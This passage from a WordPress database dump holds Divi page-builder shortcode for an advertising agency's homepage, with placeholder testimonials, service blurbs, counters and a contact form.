available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:15:25','2020-08-07 20:15:25','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(599,1,'2020-08-07 20:15:43','2020-08-07 20:15:43','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-87px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" 